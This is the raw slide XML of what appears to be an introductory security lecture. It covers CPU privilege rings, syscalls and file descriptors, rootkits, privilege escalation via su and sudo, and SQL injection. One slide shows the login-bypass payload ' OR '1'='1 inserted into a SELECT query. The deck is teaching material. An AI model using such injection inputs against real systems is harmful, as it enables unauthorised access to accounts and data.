          <a:xfrm>
            <a:off x="4986959" y="2550079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2  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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679E02-01E2-9F47-5D91-0A523B1951CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018291" y="2560677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3  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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6517B5-FCE4-0CBC-C195-84CBA91ECB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4570188" y="2255044"/>
            <a:ext cx="14909" cy="214312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6C43EF-26FB-9254-08B0-5805626BC967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7498220" y="2357438"/>
            <a:ext cx="14909" cy="214312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562057D-91E9-AA74-A2B9-2A296271FBC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3187898" y="3646766"/>
            <a:ext cx="264655" cy="16192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3DF55-B5BE-0E6A-3121-97F9C6180422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590656" y="3505266"/>
            <a:ext cx="565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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>[i]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Flowchart: Off-page Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4767532-05B4-EE57-78E9-370D4A9B4E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689017" y="4845844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owchart: Off-page Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4075E88B-E310-FD41-49D4-509F9EBC3993}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510834" y="4845843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owchart: Off-page Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDED9A6F-3675-11AD-233C-9DF3E4E625A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277310" y="4845842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owchart: Off-page Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38631C1-28DE-09AF-C453-9F34B8A08507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043786" y="4845841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9B180BC-C9C5-4F4F-DFD4-95EE191C1DD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2947457" y="5856323"/>
            <a:ext cx="724637" cy="2915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6F1870-92E5-D4FC-1E28-882A34307E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="24" idx="2"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3309776" y="3808691"/>
            <a:ext cx="10450" cy="20476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2BA2666-448F-15DA-52A2-F115692BBD43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8875563" y="3646766"/>
            <a:ext cx="264655" cy="16192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C641DEC-C033-F1D4-17C6-D5E887B00622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8645571" y="5850120"/>
            <a:ext cx="724637" cy="2915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B3EC12-05D3-693D-05E6-268968456775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 flipH="1">
            <a:off x="9007890" y="3808691"/>
            <a:ext cx="1" cy="2041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779B4E9-867F-A761-B2A8-C7591091DE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6741464" y="4251899"/>
            <a:ext cx="80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sysCall</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>READ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4E19E5-F160-9A7D-BDE1-D4D86FF43D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5222555" y="4246453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sysCall</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>WRITE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A252104E-6B41-9875-E3D5-22B2669F6F4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18064472">
            <a:off x="4360424" y="3319223"/>
            <a:ext cx="215835" cy="17645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217D79AB-2B27-0068-3B4C-25C1CC366377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3719219">
            <a:off x="4581040" y="4890966"/>
            <a:ext cx="193717" cy="14975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46204CF-3022-70E7-95B6-D84B66AA0FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5384440" y="6454192"/>
            <a:ext cx="1895271" cy="2915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389D8EF5-B97B-7FFC-4452-231CFCC8A38F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17314989">
            <a:off x="4534922" y="5717784"/>
            <a:ext cx="191478" cy="13035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F45234-C070-DEBD-BF7D-F51F241F4EC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460844" y="5825759"/>
            <a:ext cx="1540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Kernel-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Descriptor</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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1FBE50-62D4-B762-8A3A-D40846D3F049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5578243" y="6067957"/>
            <a:ext cx="13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Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) File</a:t>
            </a:r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97B4A2B0-C73D-6EF7-98C2-768DFD598181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3282706">
            <a:off x="7952127" y="3482350"/>
            <a:ext cx="186853" cy="16317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3C7D5CA7-A7AD-3420-E6AA-E9064B3C324F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17564323">
            <a:off x="7894252" y="4852632"/>
            <a:ext cx="162625" cy="13936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EDFE8112-5AC2-1217-FAD4-92B6DACDDECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4127150">
            <a:off x="7865377" y="5684697"/>
            <a:ext cx="175338" cy="132409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E58D5C-761F-9A6D-307B-87563A8B7FFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9161039" y="3505266"/>
            <a:ext cx="56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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>[j]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10700395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1137-42D6-D462-1841-1C85A56D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User Mode (Ring 3) / Kernel Mode  (Ring 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37668D-56D8-7722-DE7C-A9CC6A68DD77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1624012" y="1890712"/>
            <a:ext cx="9942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Security mode in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>built-in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>  in all modern processors   Intel, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>Amd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>, etc.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7B274-B338-AAE3-761E-EF8FFC3E65D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429923" y="2791481"/>
            <a:ext cx="11638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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>Ring 0 (Kernel Mode) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>=&gt;  memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> via direct Physical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Address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in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>Ring 3 (User Mode)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>  =&gt;  memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>restricted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> via   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>logical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>physical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> translation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>maps</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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C47D04-1B89-4EDA-0A7C-3CB5268B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481" y="4367088"/>
            <a:ext cx="2884214" cy="2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0760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1BA40-525D-1BE6-D9A6-6F929A655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A9539-0BBA-0872-8E02-913D542AC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887"/>
            <a:ext cx="10515600" cy="837063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Kernel Mode  !=   "Root" user process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BE12A4-F274-3F27-A3A6-8629148DE45D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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42E544-F64D-FA46-89E8-5D27D6A061A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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12A0FF-2200-8189-872D-363BF1A99E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4932336" y="1811093"/>
            <a:ext cx="3103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Process  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User = "root"   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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608FBA-F006-59F7-8571-39DAE1BFB54A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7479170" y="2072160"/>
            <a:ext cx="14909" cy="214312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Off-page Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD4C05C-405E-EB9B-D92F-4C961F591D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689017" y="4845844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owchart: Off-page Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82CA1035-8B68-F411-04F3-A7E534BAA138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510834" y="4845843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owchart: Off-page Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{358FC712-0D1C-A544-F466-4D8041F81A16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277310" y="4845842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owchart: Off-page Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D95CDFA-D22D-7744-2B9E-B09A11EBABBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043786" y="4845841"/>
            <a:ext cx="197308" cy="5238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0CEAF77-CF6E-8CB9-51F7-2EB420775664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5222555" y="2493706"/>
            <a:ext cx="1757362" cy="1062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2FA0518-740A-B1BB-F8CC-7EC3CB850698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4615752" y="2164515"/>
            <a:ext cx="14909" cy="214312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Down 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E2002D-D482-E5E3-13C8-28B3ECC50D22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2208888">
            <a:off x="5145517" y="3574127"/>
            <a:ext cx="198110" cy="12825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9D94BDD6-6939-70A7-F2EF-58A74ECA58B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1139485">
            <a:off x="5682436" y="3693619"/>
            <a:ext cx="186823" cy="10691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4E5AB2DA-51BE-DFA4-BF4D-0213EDFF1EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20925086">
            <a:off x="6171586" y="3695371"/>
            <a:ext cx="186823" cy="10691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26686470-5A67-EB79-790A-8D8637CDED82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19576572">
            <a:off x="6681291" y="3643029"/>
            <a:ext cx="186823" cy="10691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4DA588-9A87-669D-F455-4616DEED1BA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8199128" y="2230533"/>
            <a:ext cx="3198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programMain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(args)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ... User code ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>     systemCall0() // OK, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>allowed</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>     systemCall1() // OK, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>allowed</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>     ... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>     systemCalN2() // OK, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>allowed</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR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58586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B52ED-C87A-EA30-CD4A-7BE02E4B4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RootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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4A7AF-1667-ECB7-68BD-A963B601F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30" y="1895357"/>
            <a:ext cx="9678239" cy="272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483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8610-5B37-4791-8F28-5ECAF44D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RootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>scandal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>RootkitRevealer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3FC4C-56D4-868A-6D1A-DE0A99295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80" y="2142956"/>
            <a:ext cx="9697290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20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AAEBE-EAE8-78E8-467E-424D0EB7B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Priviledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Escalation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40F71-F1AD-1D70-DDF9-5D1331F0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130" y="1967665"/>
            <a:ext cx="2541490" cy="4599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6F51E-CAD8-7ED4-BFC7-8DF5D38E1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787" y="2019104"/>
            <a:ext cx="6694750" cy="2248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5BBF16-1CD8-8108-D9F9-E7D2A93B5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731" y="437153"/>
            <a:ext cx="3444538" cy="10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53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CE7D0-46C1-AE76-D12C-2BCBA020E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365125"/>
            <a:ext cx="11363325" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Priviledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Escalations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : { Vertical | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Horyzontal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 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4FEB97-A3F4-A5DC-378F-396DEED26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181" y="2782190"/>
            <a:ext cx="8099303" cy="175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1011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1E36-670D-1C60-11EE-8629EDD2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$ su      $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> su</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>user1  -&gt;  account2 -&gt; root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DA3D3-47BD-4DED-CF77-32C8683F3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28" y="3988647"/>
            <a:ext cx="5860759" cy="2775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24F0A3-7F51-88B8-0D4E-D08FA8E3B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268" y="1618641"/>
            <a:ext cx="6363251" cy="21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161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FEA4-395A-54E0-EACF-BF06927A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113"/>
            <a:ext cx="10515600" cy="2709862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>$ su root   ...   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t># su   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>anyuser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>... do not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password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A4C0D5-0700-C666-7C4B-D1ADDB7BB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849" y="3657552"/>
            <a:ext cx="5038999" cy="137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90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BE812-EC8A-AB5D-1911-DEFC1734D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SQL Injection [2/4] -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1F2AD-6C93-5A0A-56EF-AE3C63676425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3783935" y="2305050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input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>' OR '1'='1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A510C-9A49-9C82-48DC-F5781CE8BC7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3598196" y="4138204"/>
            <a:ext cx="186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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>replaced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> SQL: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69AAF-245E-9E2F-3B7F-5207BAAC0E08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5577373" y="4138204"/>
            <a:ext cx="5865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FROM users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHERE username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t> ' OR '1'='1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' AND password='$password'</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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88545D0-0C7E-374E-4664-4B59BC5C539F}"/>
              </a:ext>
            </a:extLst>
